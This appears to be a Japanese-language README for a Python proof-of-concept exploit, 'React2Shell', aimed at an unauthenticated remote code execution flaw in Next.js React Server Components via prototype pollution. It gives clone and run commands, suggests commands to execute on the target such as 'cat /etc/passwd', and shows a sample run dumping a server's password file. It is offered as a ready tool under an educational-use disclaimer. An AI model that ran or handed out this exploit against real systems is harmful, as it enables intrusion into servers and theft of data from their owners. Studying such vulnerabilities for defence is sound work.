
React2Shell (CVE-2025-66478): Next.js Server Componentsにおける重大なリモートコード実行(RCE)のためのPythonベースのProof of Concept。インタラクティブなCLI、カスタムペイロードインジェクション、およびクリーンな出力フォーマットを備えています。教育研究目的のみに使用してください。
Next.js サーバーコンポーネントにおけるプロトタイプ汚染を介したリモートコード実行 (RCE)
このリポジトリには、特定のバージョンの React Server Components (RSC) を使用する Next.js アプリケーションに影響する深刻な脆弱性 CVE-2025-66478 (一部の文脈では CVE-2025-55182 としても参照) の概念実証 (PoC) が含まれています。
RSCのシリアル化プロセスを操作することで、認証されていない攻撃者がプロトタイプ汚染 (__proto__:then) を介して悪意のあるペイロードを注入できます。これにより、child_process.execSync を通じてサーバー上で任意のシステムコマンドが実行される可能性があります。
開発者: ArkhamKnight47
multipart/form-data ペイロードを自動的に構築します。1:E{\"digest\":...} を除去)。\n と \r\n)を処理します。requests ライブラリ# Clone the repository
git clone https://github.com/RavinduRathnayaka/CVE-2025-55182-PoC.git
cd CVE-2025-55182-PoC
# Install dependencies
pip install requests
python CVE-2025-66478.py
以下の入力を求められます:
http://localhost:3000id、whoami、cat /etc/passwd[?] TARGET URL > http://192.168.1.5:3000
[?] COMMAND > cat /etc/passwd
[*] EXECUTING EXPLOIT...
[+] PAYLOAD SUCCESSFUL. OUTPUT BELOW:
============================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
============================================================
このツールは教育およびセキュリティ研究目的のみで提供されています。
作者(ArkhamKnight47)は、このコードの悪用に対して一切の責任を負いません。あなたが所有していない、または明示的な許可を得ていないシステムに対してこのエクスプロイトをテストすることは、違法かつ非倫理的です。
責任を持って使用してください。倫理的に学び、スタックを保護してください。